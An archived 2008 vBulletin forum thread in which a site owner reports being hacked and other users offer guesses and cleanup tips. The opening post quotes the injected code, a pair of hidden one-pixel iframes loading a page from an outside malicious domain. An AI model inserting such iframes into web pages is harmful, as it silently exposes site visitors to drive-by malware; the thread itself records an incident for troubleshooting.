vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Anyone been hacked since 3.6.9? (https://vborg.vbsupport.ru/showthread.php?t=175348)

readjono 04-06-2008 06:37 PM
Anyone been hacked since 3.6.9?
 
I've just had a horrendous weekend trying to clean up my forum after a hacker managed to add loads of script to PHP files like this:

HTML Code:
<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>
Anyone had any similar problems?

dtv100 04-06-2008 07:02 PM
what hacks you have in your board?

readjono 04-06-2008 07:04 PM
Quite a few actually. I didn't realise they posed such a security risk?

Lynne 04-06-2008 07:06 PM
Quote:
Originally Posted by readjono (Post 1484640)
Quite a few actually. I didn't realise they posed such a security risk?
Sometimes they can. You need to keep up with any updates the author makes because sometimes they are security updates.

Marco van Herwaarden 04-07-2008 06:05 AM
If they where able to edit PHP files, then it is more likely that the server is compromised.

topspeeforum 04-07-2008 12:22 PM
this happened to someone i know the other day. Make sure you search your directory completely for any file with .pwd at the end. Also search your main server page for a file named _vti_(anything). Just delete all the vti folders and .pwd files if you see any. This is a way for hackers to get your passwords by typing in a certain address.

Shazz 04-08-2008 01:17 AM
Quote:
Originally Posted by Marco van Herwaarden (Post 1485038)
If they where able to edit PHP files, then it is more likely that the server is compromised.
Yea, pretty hard to go through vBulletin's admincp to get there :rolleyes:

SEOvB 04-08-2008 01:37 AM
you can't edit php files thru the admincp? I'm not sure if thats what you were tryin to say or not though?

Marco van Herwaarden 04-12-2008 09:41 AM
There are no options in default vBulletin that would allow for editing of php files.

turbosatan 04-12-2008 11:14 AM
i got hacked a while ago and they edited the default template file to compromise my site and make a new page appear


All times are GMT. The time now is 04:29 AM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.02664 seconds
  • Memory Usage 1,727KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_html_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete